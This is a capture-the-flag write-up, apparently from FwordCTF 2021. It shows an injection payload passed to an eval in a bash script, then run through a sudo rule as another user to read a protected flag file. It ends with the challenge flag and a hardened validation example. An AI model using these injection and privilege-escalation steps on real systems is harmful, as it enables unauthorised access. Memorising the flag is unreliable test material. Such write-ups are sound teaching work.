Let's **ssh** into the target machine with the given password.
```sh
$ ssh -p 10000 [email protected]
...
user1@989e5134aee5:/home/user1$ whoami
user1
user1@989e5134aee5:/home/user1$ pwd
/home/user1
```
We are `user1` and we are in the `/home/user1` directory.

There are two interesting files in it.
```sh
user1@8753298afbf4:/home/user1$ ls -lah
total 32K
drwxrwxr-t 1 root user1 4.0K Aug 27 22:44 .
drwxr-xr-x 1 root root 4.0K Aug 27 22:43 ..
-rw-r--r-- 1 user1 user1 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 user1 user1 3.7K Feb 25 2020 .bashrc
-rw-r--r-- 1 user1 user1 807 Feb 25 2020 .profile
-rwxr-xr-x 1 root user-privileged 945 Aug 27 22:09 devops.sh
-rwxr----- 1 root user-privileged 67 Aug 27 22:09 flag.txt
```
The flag must be in `flag.txt`. However, we can't read it: the file is owned by `root`, mode `rwxr-----`, group **user-privileged**, and we are not in that group.

But we can read `devops.sh`, which is a bash script.
```sh
user1@98f2e7ef5bdd:/home/user1$ cat devops.sh
#!/bin/bash
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:"
exec 2>/dev/null
name="deploy"
while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do case $1 in
-V | --version )
echo "Beta version"
exit
;;
-d | --deploy )
deploy=1
;;
-p | --permission )
permission=1
;;
esac; shift; done
if [[ "$1" == '--' ]]; then shift; fi

echo -ne "Welcome To Devops Swiss Knife \o/\n\nWe deploy everything for you:\n"

if [[ deploy -eq 1 ]];then
echo -ne "Please enter your true name if you are a shinobi\n"
read -r name
eval "function $name { terraform init &>/dev/null && terraform apply &>/dev/null ; echo \"It should be deployed now\"; }"
export -f $name
fi

isAdmin=0
# Ofc only admins can deploy stuffs o//
if [[ $isAdmin -eq 1 ]];then
$name
fi

# Check your current permissions admin-san
if [[ $permission -eq 1 ]];then
echo "You are: "
id
fi
```
There is an **eval** command, which executes its argument as shell code, at line 25 of `devops.sh`.

Before executing that command, the script asks for `name` with `read -r` and interpolates the value directly into the string passed to **eval**.

There is no filter on `name`. So, command **injection** is possible!

One thing to note: we have to pass `-d` or `--deploy` when executing the script, otherwise `deploy` is never set and the script never reaches that part.
```sh
...
while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do case $1 in
-V | --version )
echo "Beta version"
exit
;;
-d | --deploy ) #!!!
deploy=1 #!!!
;;
-p | --permission )
permission=1
;;
esac; shift; done
...
if [[ deploy -eq 1 ]];then #!!!
echo -ne "Please enter your true name if you are a shinobi\n"
read -r name
eval "function $name { terraform init &>/dev/null && terraform apply &>/dev/null ; echo \"It should be deployed now\"; }"
export -f $name
fi
...
```
Let's give `a { echo GOOD; }; a #` when the script asks for `name`. After interpolation, the string handed to **eval** looks like this (the `#` turns the rest of the original function body into a comment):

`function a { echo GOOD; }; a # { terraform init &>/dev/null && terraform apply &>/dev/null ; echo "It should be deployed now"; }`

```sh
user1@ef597d4726a8:/home/user1$ ./devops.sh -d
Welcome To Devops Swiss Knife \o/

We deploy everything for you:
Please enter your true name if you are a shinobi
a { echo GOOD; }; a #
GOOD
```
Yay it works!

Now, let's try to read the flag.
```sh
user1@17587ec35262:/home/user1$ ./devops.sh -d
Welcome To Devops Swiss Knife \o/

We deploy everything for you:
Please enter your true name if you are a shinobi
a { cat flag.txt; }; a #
user1@17587ec35262:/home/user1$
```
Hmm... nothing happened?

That's because we are still just `user1` when executing the script, so `cat` cannot open `flag.txt`. We don't even see the "Permission denied" error, because the script runs `exec 2>/dev/null` and discards stderr.
```sh
user1@17587ec35262:/home/user1$ ./devops.sh -d
Welcome To Devops Swiss Knife \o/

We deploy everything for you:
Please enter your true name if you are a shinobi
a { whoami; }; a #
user1
```
We have to find a way to become `user-privileged`.

Let's check what commands `user1` can run with **sudo**.
```sh
user1@17587ec35262:/home/user1$ sudo -l
Matching Defaults entries for user1 on 17587ec35262:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user1 may run the following commands on 17587ec35262:
(user-privileged) NOPASSWD: /home/user1/devops.sh
```
It looks like we can run `devops.sh` as `user-privileged` without a password, and because the sudo rule points at this exact script, the injected command inherits that user's access to `flag.txt`.

Let's try it!
```sh
user1@6d6027070d37:/home/user1$ sudo -u user-privileged ./devops.sh -d
Welcome To Devops Swiss Knife \o/

We deploy everything for you:
Please enter your true name if you are a shinobi
a { cat flag.txt; }; a #
FwordCTF{W00w_KuR0ko_T0ld_M3_th4t_Th1s_1s_M1sdirecti0n_BasK3t_FTW}
```
And, there is the flag!

`FwordCTF{W00w_KuR0ko_T0ld_M3_th4t_Th1s_1s_M1sdirecti0n_BasK3t_FTW}`
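The root cause is that `devops.sh` builds an `eval` string from unchecked user input, and the sudo rule then runs that script as another user. The following is an added example of the hardened pattern, not code from the original writeup or the challenge: the name is accepted only if it is a plain shell identifier, and the deploy body is fixed (the terraform calls are replaced by an `echo` so the example runs offline).

```shell
#!/bin/bash
# Added example, not part of the original writeup or the challenge files.
# Hardened form of the vulnerable step in devops.sh, which runs
#     eval "function $name { ...; }"
# with $name taken straight from `read -r name`. Only a plain shell
# identifier may reach eval.

# Return 0 if NAME is a safe shell identifier, 1 otherwise.
# POSIX case patterns: any byte outside [A-Za-z0-9_] (spaces, braces,
# ';', '#', newlines) is rejected, as is an empty or digit-leading name.
is_valid_fn_name() {
    case "$1" in
        ''|[0-9]*)        return 1 ;;
        *[!A-Za-z0-9_]*)  return 1 ;;
        *)                return 0 ;;
    esac
}

# The deploy action with a fixed body; the terraform calls from the
# script are replaced by an echo so the example runs offline.
_deploy_impl() {
    echo "It should be deployed now"
}

# Define a function called NAME that runs the deploy action.
# Refuses (returns 1, defines nothing) when NAME is not an identifier.
define_deploy_function() {
    name="$1"
    if ! is_valid_fn_name "$name"; then
        echo "refusing to define a function from an unsafe name" >&2
        return 1
    fi
    # eval is still needed to create a function with a dynamic name, but
    # only a validated identifier gets here, so nothing else is executed.
    eval "$name() { _deploy_impl; }"
}

# Stand-alone demo: the writeup's payload is rejected, a plain name works.
define_deploy_function 'a { echo GOOD; }; a #' 2>/dev/null || echo "payload rejected"
define_deploy_function deploy && deploy
```

The same check applied at the `read -r name` prompt would have closed the injection even with the sudo rule left in place.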

Original writeup (https://github.com/MikelAcker/CTF_WRITEUPS_2021/tree/main/FwordCTF_2021_Writeup/Bash/devprivops).